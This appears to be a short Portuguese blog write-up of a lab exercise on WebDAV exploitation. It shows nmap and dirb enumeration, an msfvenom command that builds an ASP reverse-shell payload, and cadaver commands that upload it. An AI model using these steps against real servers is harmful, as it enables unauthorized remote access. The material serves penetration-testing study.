Webdav Exploit - Webshell ASP
O que é Webdav?
É um protocolo que permite o compartilhamento, a cópia e edição de arquivos através do servidor web. Quando descoberto o diretório /webdav durante um pentest/ataque, o webdav pode ser um vetor para explorar o servidor web.
NMAP Geral
nmap -Pn -sV [IP]
Enumeração de diretórios
dirb [url]
O laboratório fornece credencial para acesso ao diretório /webdav
NMAP Script to Webdav
nmap -Pn -p 80 --script http-webdav-scan [IP]
O resultado da ferramenta Webdav confirma a permissão para upload e execução dos arquivos .html, .txt e .asp
MSFVenom to Reverse Shell
Usar o msfvenom para criar o payload da shell reversa. Aqui vale destacar que vou utilizar um payload Non-Meterpreter, ou seja, a conexão da shell reversa não depende do listener do Meterpreter e pode ser estabelecida com o listener do NCat.
msfvenom -p windows/shell/reverse_tcp LHOST=[IP] LPORT=[IP] -f asp > rshell.asp
Cadaver to Exploit Webdav
A ferramenta Cadaver permite acessar o diretório Webdav e fazer o upload do arquivo. Na imagem abaixo é possível ver a sequência de uso da ferramenta.
1 - comando cadaver [url] para acessar o diretório
2 - comandos disponíveis após o acesso
3 - upload do payload da shell reversa com o comando put [arquivo]
Comentários
Postar um comentário